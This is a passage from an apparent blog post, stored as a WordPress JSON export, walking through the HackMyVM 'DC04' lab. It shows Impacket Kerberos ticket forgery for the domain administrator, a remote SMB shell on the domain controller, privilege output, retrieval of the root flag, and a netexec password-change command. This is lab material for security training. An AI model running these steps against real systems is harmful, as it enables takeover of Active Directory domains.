soupedecode.local\/administrator@dc01.soupedecode.local -k -target-ip 192.168.10.101\nFri Jun 13 20:31:35 EDT 2025\nImpacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies \n\n[*] Creating basic skeleton ticket and PAC Infos\n[*] Customizing ticket for soupedecode.local\/administrator\n[*]     PAC_LOGON_INFO\n[*]     PAC_CLIENT_INFO_TYPE\n[*]     EncTicketPart\n[*]     EncAsRepPart\n[*] Signing\/Encrypting final ticket\n[*]     PAC_SERVER_CHECKSUM\n[*]     PAC_PRIVSVR_CHECKSUM\n[*]     EncTicketPart\n[*]     EncASRepPart\n[*] Saving ticket in administrator.ccache\nImpacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies \n\nPassword:\n[*] SMBv3.0 dialect used\n[!] Launching semi-interactive shell - Careful what you execute\n[!] 
Press help for extra shell commands\nC:\\&gt;whoami \/all\n\nUSER INFORMATION\n----------------\n\nUser Name                       SID                                        \n=============================== ===========================================\nsoupedecode.local\\administrator S-1-5-21-2986980474-46765180-2505414164-500\n\nGROUP INFORMATION\n-----------------\n\nGroup Name                                         Type             SID                                         Attributes                                                     \n================================================== ================ =========================================== ===============================================================\nEveryone                                           Well-known group S-1-1-0                                     Mandatory group, Enabled by default, Enabled group             \nBUILTIN\\Administrators                             Alias            S-1-5-32-544                                Mandatory group, Enabled by default, Enabled group, Group owner\nBUILTIN\\Users                                      Alias            S-1-5-32-545                                Mandatory group, Enabled by default, Enabled group             \nBUILTIN\\Pre-Windows 2000 Compatible Access         Alias            S-1-5-32-554                                Mandatory group, Enabled by default, Enabled group             \nNT AUTHORITY\\NETWORK                               Well-known group S-1-5-2                                     Mandatory group, Enabled by default, Enabled group             \nNT AUTHORITY\\Authenticated Users                   Well-known group S-1-5-11                                    Mandatory group, Enabled by default, Enabled group             \nNT AUTHORITY\\This Organization                     Well-known group S-1-5-15                                    Mandatory group, Enabled by default, Enabled group             \nSOUPEDECODE\\Domain Admins  
                        Group            S-1-5-21-2986980474-46765180-2505414164-512 Mandatory group, Enabled by default, Enabled group             \nSOUPEDECODE\\Group Policy Creator Owners            Group            S-1-5-21-2986980474-46765180-2505414164-520 Mandatory group, Enabled by default, Enabled group             \nSOUPEDECODE\\Schema Admins                          Group            S-1-5-21-2986980474-46765180-2505414164-518 Mandatory group, Enabled by default, Enabled group             \nSOUPEDECODE\\Enterprise Admins                      Group            S-1-5-21-2986980474-46765180-2505414164-519 Mandatory group, Enabled by default, Enabled group             \nSOUPEDECODE\\Denied RODC Password Replication Group Alias            S-1-5-21-2986980474-46765180-2505414164-572 Mandatory group, Enabled by default, Enabled group, Local Group\nMandatory Label\\High Mandatory Level               Label            S-1-16-12288                                                                                               \n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name                            Description                                                        State  \n========================================= ================================================================== =======\nSeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled\nSeMachineAccountPrivilege                 Add workstations to domain                                         Enabled\nSeSecurityPrivilege                       Manage auditing and security log                                   Enabled\nSeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled\nSeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled\nSeSystemProfilePrivilege                  Profile system performance              
                           Enabled\nSeSystemtimePrivilege                     Change the system time                                             Enabled\nSeProfileSingleProcessPrivilege           Profile single process                                             Enabled\nSeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled\nSeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled\nSeBackupPrivilege                         Back up files and directories                                      Enabled\nSeRestorePrivilege                        Restore files and directories                                      Enabled\nSeShutdownPrivilege                       Shut down the system                                               Enabled\nSeDebugPrivilege                          Debug programs                                                     Enabled\nSeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled\nSeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled\nSeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled\nSeUndockPrivilege                         Remove computer from docking station                               Enabled\nSeEnableDelegationPrivilege               Enable computer and user accounts to be trusted for delegation     Enabled\nSeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled\nSeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled\nSeCreateGlobalPrivilege                   Create global objects                                              Enabled\nSeIncreaseWorkingSetPrivilege             Increase a process working set    
                                 Enabled\nSeTimeZonePrivilege                       Change the time zone                                               Enabled\nSeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled\nSeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled\n\nUSER CLAIMS INFORMATION\n-----------------------\n\nUser claims unknown.\n\nKerberos support for Dynamic Access Control on this device has been disabled.\n\nC:\\&gt;cd users\/administrator\/desktop\nC:\\users\\administrator\\desktop&gt;ls\n&#039;ls&#039; is not recognized as an internal or external command,\noperable program or batch file.\n\nC:\\users\\administrator\\desktop&gt;dir\n Volume in drive C has no label.\n Volume Serial Number is CCB5-C4FB\n\n Directory of C:\\users\\administrator\\desktop\n\n11\/07\/2024  12:08 PM    &lt;DIR&gt;          .\n06\/15\/2024  12:56 PM    &lt;DIR&gt;          ..\n11\/07\/2024  03:08 AM                32 root.txt\n               1 File(s)             32 bytes\n               2 Dir(s)  44,110,970,880 bytes free\n\nC:\\users\\administrator\\desktop&gt;type root.txt\n1c66eabe105636d7e0b82ec1fa87cb7a\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC04]\n\u2514\u2500$ cat \/etc\/krb5.conf\n[libdefaults]\n    default_realm = SOUPEDECODE.LOCAL\n\n[realms]\n    SOUPEDECODE.LOCAL = {\n        kdc = dc01.soupedecode.local\n        admin_server = dc01.soupedecode.local\n    }\n\n[domain_realm]\n    soupedecode.local = SOUPEDECODE.LOCAL\n    .soupedecode.local = SOUPEDECODE.LOCAL\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC04]\n\u2514\u2500$ tail -n 1 \/etc\/hosts\n192.168.10.101  soupedecode.local 
SOUPEDECODE.LOCAL<\/code><\/pre>\n<h2>A new way to change an expired password<\/h2>\n<p>The third reference writeup shows a new way to change an expired password that does not require opening a terminal on the target machine:<\/p>\n<pre><code class=\"language-bash\">netexec smb $IP -u websvc -p &#039;hgbepass&#039; -M change-password -o NEWPASS=&#039;pass&#039;<\/code><\/pre>\n<p>But it did not work locally for me; it reported that no such module exists... Probably the module was added recently and has not yet been synced into the netexec package shipped with kali!<\/p>\n<h2>References<\/h2>\n<p><a href=\"http:\/\/www.vxer.cn\/2024\/12\/10\/hackmyvm-dc04-walkthrough\/\">http:\/\/www.vxer.cn\/2024\/12\/10\/hackmyvm-dc04-walkthrough\/<\/a><\/p>\n<p><a href=\"https:\/\/sunsetaction.top\/2025\/04\/03\/HackMyVMDC04\/\">https:\/\/sunsetaction.top\/2025\/04\/03\/HackMyVMDC04\/<\/a><\/p>\n<p><a href=\"https:\/\/github.com\/BanYio\/HackMyVM\/blob\/main\/DC04.md\">https:\/\/github.com\/BanYio\/HackMyVM\/blob\/main\/DC04.md<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>DC04 Information gathering Port scanning \u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04] \u2514\u2500$ rustsca 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-867","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/867","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=867"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/867\/revisions"}],"predecessor-version":[{"id":868,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/867\/revisions\/868"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=867"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=867"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=867"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}